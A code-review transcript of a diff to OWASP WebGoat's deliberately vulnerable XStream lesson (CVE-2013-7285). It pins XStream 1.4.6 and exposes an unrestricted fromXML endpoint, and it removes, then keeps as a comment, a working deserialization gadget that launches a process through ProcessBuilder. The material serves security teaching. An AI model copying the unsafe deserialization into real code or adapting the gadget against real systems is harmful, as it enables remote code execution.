Xstream RCE works now
		| @ -259,6 +259,12 @@ | ||||
|             <artifactId>docker-maven-plugin</artifactId> | ||||
|             <version>0.4.10</version> | ||||
|         </dependency> | ||||
|          | ||||
| 		<dependency> | ||||
| 			<groupId>com.thoughtworks.xstream</groupId> | ||||
| 			<artifactId>xstream</artifactId> | ||||
| 			<version>1.4.6</version> | ||||
| 		</dependency> | ||||
|  | ||||
|         <!-- ************* END spring MVC and related dependencies ************** --> | ||||
|         <!-- ************* START: Dependencies for Unit and Integration Testing ************** --> | ||||
|  | ||||
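Review bot: The new `xstream` dependency is pinned to 1.4.6 with nothing saying the old release is deliberate, so a dependency-update bot or a later maintainer will bump it and silently break the lesson that relies on this version. Add `<!-- Deliberately pinned to a vulnerable release for the VulnerableComponents lesson; do not upgrade -->` directly above the `<dependency>` element. The added block is also indented with tabs while the surrounding `<dependency>` entries use spaces; match the file's existing indentation.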
| @ -0,0 +1,22 @@ | ||||
| package org.owasp.webgoat.plugin; | ||||
|  | ||||
| import com.thoughtworks.xstream.converters.Converter; | ||||
| import com.thoughtworks.xstream.converters.MarshallingContext; | ||||
| import com.thoughtworks.xstream.converters.UnmarshallingContext; | ||||
| import com.thoughtworks.xstream.io.HierarchicalStreamReader; | ||||
| import com.thoughtworks.xstream.io.HierarchicalStreamWriter; | ||||
|  | ||||
| public class CatchAllConverter implements Converter { | ||||
|  | ||||
|     public boolean canConvert(Class clazz) { | ||||
|         return true; | ||||
|     } | ||||
|  | ||||
|     public void marshal(Object value, HierarchicalStreamWriter writer, MarshallingContext context) { | ||||
|     } | ||||
|  | ||||
|     public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) { | ||||
|        return null; | ||||
|     } | ||||
|  | ||||
| } | ||||
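Review bot: `canConvert` answers true for every class and `unmarshal` returns null for every element, so once this converter is registered (the lesson registers it at `PRIORITY_VERY_LOW`, currently commented out) any type XStream cannot otherwise handle is silently turned into null instead of raising the `ConversionException` the lesson's catch block depends on. If the class is kept, a Javadoc line such as `/** Fallback converter that swallows every unknown element and yields null; registering it hides conversion errors. */` should make that consequence explicit. The three interface methods are also missing `@Override`.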
| @ -0,0 +1,18 @@ | ||||
| package org.owasp.webgoat.plugin; | ||||
|  | ||||
| import com.thoughtworks.xstream.annotations.XStreamAlias; | ||||
|  | ||||
| @XStreamAlias("contact") | ||||
| public class Contact { | ||||
|     @XStreamAlias("name") | ||||
|     String name; | ||||
|  | ||||
|     public String getName() { | ||||
|         return name; | ||||
|     } | ||||
|  | ||||
|     public void setName(String name) { | ||||
|         this.name = name; | ||||
|     } | ||||
|  | ||||
| } | ||||
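Review bot: `Contact` does not override `toString()`, yet the lesson formats `expl.toString()` into the feedback "You created contact {0}", so the user sees `Contact@<hash>` rather than the name they entered. Add `@Override public String toString() { return name; }`. The sample contact XML on the new lesson page lists `id`, `firstName`, `lastName` and `email`, none of which exist on this class, so that sample will not map to it as written; either the class or the lesson text should be brought into line.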
| @ -0,0 +1,30 @@ | ||||
| package org.owasp.webgoat.plugin; | ||||
|  | ||||
| import com.thoughtworks.xstream.converters.Converter; | ||||
| import com.thoughtworks.xstream.converters.MarshallingContext; | ||||
| import com.thoughtworks.xstream.converters.UnmarshallingContext; | ||||
| import com.thoughtworks.xstream.io.HierarchicalStreamReader; | ||||
| import com.thoughtworks.xstream.io.HierarchicalStreamWriter; | ||||
|  | ||||
| public class ContactConverter implements Converter { | ||||
|  | ||||
|     public boolean canConvert(Class clazz) { | ||||
|         return clazz.equals(Contact.class); | ||||
|     } | ||||
|  | ||||
|     public void marshal(Object value, HierarchicalStreamWriter writer, MarshallingContext context) { | ||||
|         Contact contact = (Contact) value; | ||||
|         writer.startNode("name"); | ||||
|         writer.setValue(contact.getName()); | ||||
|         writer.endNode(); | ||||
|     } | ||||
|  | ||||
|     public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) { | ||||
|         Contact contact = new Contact(); | ||||
|         reader.moveDown(); | ||||
|         contact.setName(reader.getValue()); | ||||
|         reader.moveUp(); | ||||
|         return contact; | ||||
|     } | ||||
|  | ||||
| } | ||||
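Review bot: `unmarshal` calls `reader.moveDown()` unconditionally, so a `<contact/>` element with no children throws from the reader instead of yielding an empty `Contact`; guard the descent with `if (reader.hasMoreChildren()) { ... }` around the three reader calls. The converter also takes whatever the first child is as the name without checking `reader.getNodeName()`, which is worth a comment if that looseness is intended. `marshal` passes `contact.getName()` straight to `writer.setValue`, which will fail for a contact whose name was never set. All three methods are missing `@Override`.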
| @ -1,6 +1,7 @@ | ||||
| package org.owasp.webgoat.plugin; | ||||
|  | ||||
| import com.thoughtworks.xstream.XStream; | ||||
| import java.io.IOException; | ||||
|  | ||||
| import org.owasp.webgoat.assignments.AssignmentEndpoint; | ||||
| import org.owasp.webgoat.assignments.AssignmentPath; | ||||
| import org.owasp.webgoat.assignments.AttackResult; | ||||
| @ -9,7 +10,8 @@ import org.springframework.web.bind.annotation.RequestMethod; | ||||
| import org.springframework.web.bind.annotation.RequestParam; | ||||
| import org.springframework.web.bind.annotation.ResponseBody; | ||||
|  | ||||
| import java.io.IOException; | ||||
| import com.thoughtworks.xstream.XStream; | ||||
| import com.thoughtworks.xstream.io.xml.DomDriver; | ||||
|  | ||||
| /** | ||||
|  * ************************************************************************************************* | ||||
| @ -50,34 +52,50 @@ public class VulnerableComponentsLesson extends AssignmentEndpoint { | ||||
|  | ||||
| 	@RequestMapping(method = RequestMethod.POST) | ||||
| 	public @ResponseBody AttackResult completed(@RequestParam String payload) throws IOException { | ||||
| 		String process = "open"; 		 | ||||
| 		String arguments = "/Applications/Calculator.app";		 | ||||
|  | ||||
| 		 | ||||
| 		String payload2 = "<sorted-set>" +   | ||||
| 						 "<string>foo</string>" + | ||||
| 						 "<dynamic-proxy>" +  | ||||
| 						 "<interface>java.lang.Comparable</interface>" + | ||||
| 						 "<handler class=\"java.beans.EventHandler\">" + | ||||
| 						 "    <target class=\"java.lang.ProcessBuilder\">" + | ||||
| 						 "         <command>" + | ||||
| 						 "             <string>" + process + "</string>" + | ||||
| 						 "             <string>" + arguments + "</string>" + | ||||
| 						 "        </command>" + | ||||
| 						 "    </target>" + | ||||
| 						 "    <action>start</action>" + | ||||
| 						 "</handler>" +  | ||||
| 						 "</dynamic-proxy>" + 						 | ||||
| 						"</sorted-set>"; | ||||
| 		XStream xstream = new XStream(); | ||||
| 		String xml = (String)xstream.fromXML(payload2); | ||||
|        if (!payload.toString().equals("")) { | ||||
|             return trackProgress(success() | ||||
|                 .feedback("vulnerable-components") | ||||
|                 .feedbackArgs(xml) | ||||
|                 .build()); | ||||
|         } else { | ||||
|         XStream xstream = new XStream(new DomDriver()); | ||||
| //        xstream.processAnnotations(Contact.class); | ||||
| //        xstream.registerConverter(new ContactConverter()); | ||||
| //        xstream.registerConverter(new CatchAllConverter(), XStream.PRIORITY_VERY_LOW); | ||||
|   | ||||
| //        Contact c = new Contact(); | ||||
| //        c.setName("Alvaro"); | ||||
| //        String sc = xstream.toXML(c); | ||||
| //        System.out.println(sc); | ||||
|  | ||||
|  | ||||
| //        String payload2 = "<sorted-set>" + | ||||
| //                "<string>foo</string>" + | ||||
| //                "<dynamic-proxy>" + | ||||
| //                "<interface>java.lang.Comparable</interface>" + | ||||
| //                "<handler class=\"java.beans.EventHandler\">" + | ||||
| //                " <target class=\"java.lang.ProcessBuilder\">" + | ||||
| //                " <command>" + | ||||
| //                " <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>" + | ||||
| //                " </command>" + | ||||
| //                " </target>" + | ||||
| //                " <action>start</action>" + | ||||
| //                "</handler>" + | ||||
| //                "</dynamic-proxy>" + | ||||
| //                "</sorted-set>"; | ||||
|  | ||||
|         try { | ||||
| //        	System.out.println("Payload:" + payload); | ||||
|             Contact expl = (Contact) xstream.fromXML(payload); | ||||
|             return trackProgress(success().feedback("vulnerable-components.fromXML").feedbackArgs(expl.toString()).build()); | ||||
|  | ||||
|         } catch (com.thoughtworks.xstream.converters.ConversionException ex) { | ||||
|         	ex.printStackTrace(); | ||||
|         	if (ex.getMessage().contains("Integer")) | ||||
|         	{ | ||||
|                 return trackProgress(success().feedback("vulnerable-components.success").build()); | ||||
|         	} | ||||
|             return trackProgress(failed().feedback("vulnerable-components.close").build()); | ||||
|         } | ||||
|  | ||||
|        } | ||||
|  | ||||
|   | ||||
|  | ||||
| 	} | ||||
| } | ||||
|  | ||||
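Review bot: The cast `(Contact) xstream.fromXML(payload)` inside the try block is unchecked, so a payload whose root deserializes to another type, or to null, raises a `ClassCastException` or `NullPointerException` that the `ConversionException` catch does not cover, and the request ends in an unhandled server error instead of lesson feedback. Check the result with `instanceof` before casting and return the existing failure feedback otherwise, as below. The success test `ex.getMessage().contains("Integer")` is fragile because `getMessage()` can be null and the wording belongs to XStream; this is flagged rather than changed here, since the lesson's detection rule is a design choice. `ex.printStackTrace()` should go through whatever logger the class uses, the commented-out `payload2`, `processAnnotations` and `registerConverter` blocks should be deleted rather than kept as comments, and `throws IOException` is declared although nothing in the body throws it. A one-line comment above `new XStream(new DomDriver())` stating that the instance is intentionally left unrestricted for this lesson would stop a future maintainer from hardening it and breaking the exercise.
```java
        try {
            Object result = xstream.fromXML(payload);
            if (!(result instanceof Contact)) {
                // valid XStream input that is not a contact is a miss, not a server error
                return trackProgress(failed().feedback("vulnerable-components.close").build());
            }
            Contact expl = (Contact) result;
            return trackProgress(success().feedback("vulnerable-components.fromXML").feedbackArgs(expl.toString()).build());
        // … unchanged: catch (ConversionException ex) block …
```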
| @ -131,6 +131,12 @@ | ||||
| 		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files, | ||||
| 		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc --> | ||||
| 		<div class="adoc-content" th:replace="doc:VulnerableComponents_content5.adoc"></div> | ||||
| 	</div> | ||||
| 	<div class="lesson-page-wrapper"> | ||||
|         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson --> | ||||
| 		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files, | ||||
| 		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc --> | ||||
| 		<div class="adoc-content" th:replace="doc:VulnerableComponents_content5a.adoc"></div> | ||||
| 		<div class="attack-container"> | ||||
| 			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div> | ||||
| 			<!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat --> | ||||
| @ -142,9 +148,14 @@ | ||||
| 				enctype="application/json;charset=UTF-8"> | ||||
| 				<div id="lessonContent"> | ||||
| 					<form accept-charset="UNKNOWN" method="POST" name="form" | ||||
| 						action="#attack/307/100" enctype=""> | ||||
| 						Enter Your XML payload: <input name="payload" value="" type="TEXT"/><input | ||||
| 							name="SUBMIT" value="Go!" type="SUBMIT"/> | ||||
| 						action="#attack/307/100" enctype="">					 | ||||
| 						<table> | ||||
| 							<tr> | ||||
| 								<td>Enter the contact's xml representation:</td> | ||||
| 								<td><textarea name="payload" value="" type="TEXT" rows="15" cols="60"/></td> | ||||
| 								<td><input name="SUBMIT" value="Go!" type="SUBMIT"/></td> | ||||
| 							</tr> | ||||
| 						</table> | ||||
| 					</form> | ||||
| 				</div> | ||||
| 			</form> | ||||
|  | ||||
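Review bot: The payload field is written as a self-closing `<textarea .../>`, but textarea is not a void element in HTML, so a browser parsing the emitted markup is likely to treat everything after it up to a `</textarea>` tag — here the rest of the page — as the textarea's text, and the Go! button never renders. Write it as `<textarea name="payload" rows="15" cols="60"></textarea>`; the `value` and `type` attributes do not apply to textarea and can be dropped.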
| @ -4,18 +4,17 @@ | ||||
|  | ||||
| * Is it old or is it stable | ||||
| * Was my lack of upgrade a deliberate choice or a lack of knowledge | ||||
|  | ||||
| === What is architectural risk? | ||||
|  | ||||
| * Is my component out of date | ||||
| * Is the project I'm using no longer active | ||||
| * Is my component unpopular | ||||
|  | ||||
| === Summary | ||||
|  | ||||
| === Summary? | ||||
| image::plugin_lessons/plugin/VulnerableComponents/images/Old-Components.png[caption="Figure: ", title="Old Components", alt="Old Components", width="355", height="304", style="lesson-image"] | ||||
| * It's really difficult to keep components up to dat | ||||
|   | ||||
|  | ||||
| For the components analyzed in 25,000 applications it was found that: | ||||
|  | ||||
| *  8% of  2 year old components did not have a newer version | ||||
| * 23% of 11 year old components did not have a newer version | ||||
|  | ||||
| image::plugin_lessons/plugin/VulnerableComponents/images/Old-Components.png[caption="Figure: ", title="Old Components", alt="Old Components", width="355", height="304", style="lesson-image"] | ||||
|  | ||||
| @ -6,8 +6,8 @@ In November of 2015, the Apache Commons Collections component latest release was | ||||
| Ref: http://www.pcworld.com/article/3004633/business-security/thousands-of-java-applications-vulnerable-to-nine-month-old-remote-code-execution-exploit.html[Thousands of Java applications vulnerable to nine-month-old remote code execution exploit] | ||||
|  | ||||
|  | ||||
| === Dinis Cruz exploit of XStream | ||||
| XStream, a relatively common XML and JSON parsing library, has a nasty little remote code execution. Ref: http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html[Dinis Cruz Blog]  | ||||
| === Dinis Cruz and pwntester exploit of XStream | ||||
| XStream, a relatively common XML and JSON parsing library, has a nasty little remote code execution. Ref: http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html[Dinis Cruz Blog] https://github.com/pwntester/XStreamPOC[pwntester/XStreamPOC]   | ||||
|  | ||||
| Let's see if you can figure out how to exploit this in WebGoat. | ||||
| You may want to read the article(s) before trying this lesson.  Let's see if you can figure out how to exploit this in WebGoat. | ||||
|  | ||||
|  | ||||
| @ -0,0 +1,14 @@ | ||||
| == Exploiting http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7285[CVE-2013-7285] (XStream) | ||||
|  | ||||
| WebGoat Sends an XML document to add contacts to a contacts database.   | ||||
| [source,xml] | ||||
| ---- | ||||
| <contact>   | ||||
|     <id>1</id> | ||||
|     <firstName>Bruce</firstName> | ||||
|     <lastName>Mayhew</lastName> | ||||
|     <email>webgoat@owasp.org</email> | ||||
| </contact>   | ||||
| ---- | ||||
|  | ||||
| For this example, we will let you enter the xml directly versus intercepting the request and modifying the data.  You provide the XML representation of a contact and WebGoat will convert it a Contact object using XStream.fromXML(xml). | ||||
| @ -1,3 +1,6 @@ | ||||
| vulnerable-components.title=Vulnerable Components | ||||
| EnterYourName=Enter your Name | ||||
| Go!=Go! | ||||
| vulnerable-components.close=Trying to deserialize null object. | ||||
| vulnerable-components.success=If you are not seeing the application you started; it may be minimized | ||||
| vulnerable-components.fromXML=You created contact {0}.  This means you did not exploit the remote code execution. | ||||